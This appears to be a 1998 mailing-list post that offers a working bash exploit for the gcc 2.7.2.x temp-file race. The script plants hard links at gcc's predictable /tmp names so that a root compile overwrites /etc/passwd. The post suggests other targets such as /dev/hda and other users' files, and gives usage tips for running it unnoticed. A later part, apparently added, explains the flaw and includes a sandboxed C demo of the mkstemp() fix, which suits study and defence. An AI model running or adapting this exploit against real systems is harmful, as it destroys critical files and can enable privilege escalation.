--begin gcc-exploit-2--
Try this. Launch it as an unprivileged user in the background (screen?), then,
as root, try to compile any file or project using gcc (eg. a typical
daemon, service, client), and watch your /etc/passwd (or any other
vital file, eg. /dev/kmem, /dev/hda). The attached exploit is an improved
version of the one I previously posted to BUGTRAQ (yesterday).
It's also possible to overwrite other users' files (if only he/she
uses gcc occasionally), system logs etc.
Vulnerable platforms: any running gcc 2.7.2.x
Compromise: overwriting files, maybe root; exploitable locally.
-- cut here --
#!/bin/bash
# [ http://www.rootshell.com ] 1/16/98
# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)

# File to be clobbered: gcc (run by root) will write its output through
# a hard link we plant at the predictable temp-file name.
VICTIM=/etc/passwd

if [ ! -f $VICTIM ]; then
  echo "I can't see my victim ($VICTIM)..."
  exit 0
fi

# Remember the victim's size so we can tell when it has been overwritten.
ORIG=`ls -l $VICTIM|awk '{print \$5}'`
echo "GCC exploit launched against $VICTIM ($ORIG bytes)."
# Lower the scheduling priority of the parent process so the loop stays unobtrusive.
renice +20 $PPID >&/dev/null
cd /tmp

while [ 1 ]; do
  # gcc 2.7.2 writes its intermediates to /tmp as cc<name>.i, .s and .o
  # under a guessable name; wait for a .i to show up and take its prefix.
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  if [ ! "$V" = "" ]; then
    # Plant hard links to the victim at the names gcc is about to open
    # for writing (same filesystem required for ln to succeed).
    ln $VICTIM ${V}.s &>/dev/null
    ln $VICTIM ${V}1.o &>/dev/null
    NOWY=`ls -l $VICTIM|awk '{print \$5}'`
    if [ "$ORIG" = "$NOWY" ]; then
      # Nothing happened yet: clean up and wait for the next compile.
      echo -n "."
      rm -f ${V}.s ${V}1.o &>/dev/null
    else
      # Size changed: gcc truncated and rewrote the victim through our link.
      echo "Voila. I'm so smart."
      rm -f ${V}.s ${V}1.o &>/dev/null
      exit 0
    fi
  fi
done
--end gcc-exploit-2--
--Phillip R. Jaenke (prj@raex.com)
Primary Developer, The Improvement Linux Project
Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/
AKA Kaeyerai (Rediscovery) of MasterTechnoMonster
Maintainer, The Cleveland Modem Guide - http://web.raex.com/~prj/
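The script above works because the compiler opens a temp file whose name an attacker can predict, with O_TRUNC and without O_EXCL, so a pre-planted link at that name redirects the write into any file the compiler's user can write. The following is an added example, not code from the post above or from gcc: it models that open() pattern in a private directory under /tmp, plants the link the way the script does, and contrasts it with the mkstemp() fix. The victim contents, the stand-in pid 12345, the "cc<pid>.s" name and the /tmp/gccrace.XXXXXX directory are all constructed for this demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed stand-ins: a fake /etc/passwd line and a fake compiler pid. */
#define VICTIM_TEXT "root:x:0:0:root:/root:/bin/sh\n"
#define FAKE_PID 12345L

/* The predictable name an old gcc would use for its assembler output. */
static void trap_path(char *out, size_t len, const char *dir)
{
    snprintf(out, len, "%s/cc%ld.s", dir, FAKE_PID);
}

/* Vulnerable pattern: guessable name, O_TRUNC, no O_EXCL. If a link already
 * sits at this path, the open follows it and truncates the link target. */
static int predictable_open(const char *dir)
{
    char path[PATH_MAX];
    trap_path(path, sizeof path, dir);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Fix: mkstemp() picks a random name and creates it with O_CREAT|O_EXCL, so a
 * pre-planted link can never be opened. The fstat() on the open descriptor is
 * a defensive check that we really got a fresh regular file with one link. */
static int safe_open(const char *dir, char *out_path, size_t out_len)
{
    struct stat st;
    snprintf(out_path, out_len, "%s/ccXXXXXX", dir);
    int fd = mkstemp(out_path);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        unlink(out_path);
        return -1;
    }
    return fd;
}

/* Attacker side, as in the script: create the victim, then plant a hard link
 * (symlink as a fallback) to it at the name the compiler is about to use. */
static int setup(char *dir, size_t dlen, char *victim, size_t vlen)
{
    char trap[PATH_MAX];
    FILE *f;
    snprintf(dir, dlen, "/tmp/gccrace.XXXXXX");
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, vlen, "%s/passwd", dir);
    if (!(f = fopen(victim, "w"))) return -1;
    fputs(VICTIM_TEXT, f);
    fclose(f);
    trap_path(trap, sizeof trap, dir);
    if (link(victim, trap) != 0 && symlink(victim, trap) != 0) return -1;
    return 0;
}

static int victim_intact(const char *victim)
{
    char buf[256] = {0};
    FILE *f = fopen(victim, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return n == strlen(VICTIM_TEXT) && memcmp(buf, VICTIM_TEXT, n) == 0;
}

static void cleanup(const char *dir, const char *victim, const char *extra)
{
    char trap[PATH_MAX];
    trap_path(trap, sizeof trap, dir);
    unlink(trap);
    unlink(victim);
    if (extra) unlink(extra);
    rmdir(dir);
}

/* Returns 1 if the compiler's output landed in the victim (attack succeeded). */
int demo_vulnerable(void)
{
    char dir[64], victim[PATH_MAX];
    int fd, clobbered;
    if (setup(dir, sizeof dir, victim, sizeof victim) != 0) return -1;
    fd = predictable_open(dir);
    if (fd >= 0) {
        if (write(fd, "assembler output\n", 17) < 0) perror("write");
        close(fd);
    }
    clobbered = !victim_intact(victim);
    cleanup(dir, victim, NULL);
    return clobbered;
}

/* Returns 1 if mkstemp() wrote to a fresh file and the victim was untouched. */
int demo_safe(void)
{
    char dir[64], victim[PATH_MAX], out[PATH_MAX];
    int fd, ok;
    if (setup(dir, sizeof dir, victim, sizeof victim) != 0) return -1;
    fd = safe_open(dir, out, sizeof out);
    if (fd < 0) { cleanup(dir, victim, NULL); return 0; }
    if (write(fd, "assembler output\n", 17) < 0) perror("write");
    close(fd);
    ok = victim_intact(victim);
    cleanup(dir, victim, out);
    return ok;
}

int main(void)
{
    printf("predictable name + planted link: victim %s\n",
           demo_vulnerable() == 1 ? "clobbered" : "intact");
    printf("mkstemp() name:                  victim %s\n",
           demo_safe() == 1 ? "intact" : "clobbered");
    return 0;
}
```

Because the plant is a hard link, the demo needs the victim and /tmp on one filesystem, which is also what the script relies on; the symlink fallback covers the other case. A compiler that needs a fixed suffix such as ".s" can use glibc's mkstemps() instead of mkstemp(), keeping the O_EXCL creation that closes the race.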